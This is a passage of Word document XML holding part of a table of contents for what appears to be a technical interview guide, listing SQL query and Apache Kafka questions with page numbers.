                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308221 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>981</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="40D4C827" w14:textId="55B83F9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2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UNION ALL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308222 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>983</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3E0F62B3" w14:textId="6DC9552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2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SQL Query - Display a list of students which have a Mathematics subject?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308223 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>984</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6F4A4165" w14:textId="6A40707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2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SQL Query - 3rd highest salary of an employee?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308224 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>985</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EBBADC4" w14:textId="7103E87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2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dense and rank in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308225 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>985</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5105E53C" w14:textId="4504DB0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2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SQL and NoSQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308226 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>986</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6A380F01" w14:textId="5B6C722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2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Stored Procedure and Function?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308227 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>988</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="03A47BE6" w14:textId="2D59F4B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2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ransaction in SQL?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308228 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>990</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5831D48F" w14:textId="677D848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29" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cstheme="minorHAnsi"/>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SQL Query - Consider 2 tables, find out 3 employees who are earning the highest salary in each department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308229 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>991</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0AB46006" w14:textId="45376E4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3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SQL Query - that categorizes employees based on their salary into different percentage ranges.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308230 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>992</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44D47323" w14:textId="441F74B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3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SQL Query - Find the department name who does not have an employee? (Employee and Department table given)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308231 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>993</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2551DEF5" w14:textId="4EF46C4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3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Composite key?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308232 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>994</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="50E31D4B" w14:textId="4F59BDB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3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Self-join?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308233 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>994</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="33E79A3E" w14:textId="1B10661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3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SQL Query - We have Table A (2 columns and 4 rows) and Table B (2 columns and 4 rows) and I want to print all 8 rows? Write a query for it? (Use Union All)?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308234 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>995</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="571507C0" w14:textId="7B1B56A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3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SQL Union and Union All?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308235 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>996</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5CD738AD" w14:textId="1DD6F0C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3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SQL Query - Print the employee’s name which does not have any department?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308236 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>996</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="47A61C37" w14:textId="604835D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3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SQL Query - Employee table and add one extra column in output as category? Let's say if salary is in 1 to  4000 then Category 1, 4000 - 7000 then category 2, 7000 - 10000 then category 3?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308237 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>997</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4A953BE0" w14:textId="275A52D3" w:rsidR="00012799" w:rsidRDefault="00012799">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308238" w:history="1">
            <w:r w:rsidRPr="00D73205">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Kafka</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308238 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>998</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A26EEAB" w14:textId="548364D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3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Apache Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308239 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>998</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="229EFE59" w14:textId="36CE435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4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y does Kafka compare to RabbitMQ?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308240 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>998</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="48906935" w14:textId="35CCBD9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4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the key components of Kafka (Producer, Consumer, Broker, Topic, Partition, and Consumer Group) and how they interact in a Kafka-based system?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308241 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>999</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6720FE07" w14:textId="1FAD40A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4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scale up Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308242 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1001</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="77BE4255" w14:textId="29C40A2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4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are the default partitions in kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308243 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5903B761" w14:textId="30082B2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4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topic and partition in Kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308244 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1004</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7E9EF1DB" w14:textId="726DBFC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4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Is there any ordering of messages in partitions in kafka?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc196308245 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00CA4398">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="32B154CC" w14:textId="2030DF5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4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does partition assignment happen? What method is used?</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
